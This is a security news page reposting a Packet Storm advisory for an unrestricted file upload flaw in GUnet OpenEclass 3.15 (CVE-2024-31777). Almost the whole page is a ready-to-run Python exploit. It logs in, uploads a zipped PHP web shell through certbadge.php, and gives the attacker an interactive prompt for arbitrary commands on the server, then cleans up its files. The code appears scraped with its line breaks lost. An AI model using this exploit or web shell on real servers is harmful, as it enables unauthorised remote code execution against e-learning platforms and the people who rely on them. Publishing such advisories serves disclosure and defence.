Security
Headlines
HeadlinesLatestCVEs

Headline

GUnet OpenEclass E-learning 3.15 File Upload / Command Execution

GUnet OpenEclass E-learning platform version 3.15 suffers from an unrestricted file upload vulnerability in certbadge.php that allows for remote command execution.

Packet Storm
#vulnerability#web#php#rce#auth
import requestsimport argparseimport zipfileimport osimport sysRED = '\033[91m'GREEN = '\033[92m'YELLOW = '\033[93m'RESET = '\033[0m'ORANGE = '\033[38;5;208m'MALICIOUS_PAYLOAD = """\<?phpif(isset($_REQUEST['cmd'])){        $cmd = ($_REQUEST['cmd']);        system($cmd);        die;}?>"""def banner():    print(f'''{RED}{YELLOW} ============================ Author: Frey ============================{RESET}''')def execute_command(openeclass, filename):    while True:        # Prompt for user input with "eclass"        cmd = input(f"{RED}[{YELLOW}eClass{RED}]~# {RESET}")        # Check if the command is 'quit', then break the loop        if cmd.lower() == "quit":            print(f"{ORANGE}\nExiting...{RESET}")            clean_server(openeclass)            sys.exit()        # Construct the URL with the user-provided command        url = f"{openeclass}/courses/user_progress_data/cert_templates/{filename}?cmd={cmd}"        # Execute the GET request        try:            response = requests.get(url)            # Check if the request was successful            if response.status_code == 200:                # Print the response text                print(f"{GREEN}{response.text}{RESET}")        except requests.exceptions.RequestException as e:            # Print any error that occurs during the request            print(f"{RED}An error occurred: {e}{RESET}")def upload_web_shell(openeclass, username, password):    login_url = f'{openeclass}/?login_page=1'    login_page_url = f'{openeclass}/main/login_form.php?next=%2Fmain%2Fportfolio.php'    # Login credentials    payload = {        'next': '/main/portfolio.php',        'uname': f'{username}',        'pass': f'{password}',        'submit': 'Enter'    }    headers = {        'Referer': login_page_url,    }    # Use a session to ensure cookies are handled correctly    with requests.Session() as session:        # (Optional) Initially visit the login page if needed to get a fresh session cookie or any other required tokens        session.get(login_page_url)        # Post the login credentials        response = session.post(login_url, headers=headers, data=payload)        # Create a zip file containing the malicious payload        zip_file_path = 'malicious_payload.zip'        with zipfile.ZipFile(zip_file_path, 'w') as zipf:            zipf.writestr('evil.php', MALICIOUS_PAYLOAD.encode())        # Upload the zip file        url = f'{openeclass}/modules/admin/certbadge.php?action=add_cert'        files = {            'filename': ('evil.zip', open(zip_file_path, 'rb'), 'application/zip'),            'certhtmlfile': (None, ''),            'orientation': (None, 'L'),            'description': (None, ''),            'cert_id': (None, ''),            'submit_cert_template': (None, '')        }        response = session.post(url, files=files)        # Clean up the zip file        os.remove(zip_file_path)        # Check if the upload was successful        if response.status_code == 200:            print(f"{GREEN}Payload uploaded successfully!{RESET}")            return True        else:            print(f"{RED}Failed to upload payload. Exiting...{RESET}")            return Falsedef clean_server(openeclass):    print(f"{ORANGE}Cleaning server...{RESET}")    # Remove the uploaded files    requests.get(f"{openeclass}/courses/user_progress_data/cert_templates/evil.php?cmd=rm%20evil.zip")    requests.get(f"{openeclass}/courses/user_progress_data/cert_templates/evil.php?cmd=rm%20evil.php")    print(f"{GREEN}Server cleaned successfully!{RESET}")def main():    parser = argparse.ArgumentParser(description="Open eClass – CVE-CVE-2024-31777: Unrestricted File Upload Leads to Remote Code Execution")    parser.add_argument('-u', '--username', required=True, help="Username for login")    parser.add_argument('-p', '--password', required=True, help="Password for login")    parser.add_argument('-e', '--eclass', required=True, help="Base URL of the Open eClass")    args = parser.parse_args()    banner()    # Running the main login and execute command function    if upload_web_shell(args.eclass, args.username, args.password):        execute_command(args.eclass, 'evil.php')if __name__ == "__main__":    main()

Packet Storm: Latest News

Siemens Energy Omnivise T3000 8.2 SP3 Privilege Escalation / File Download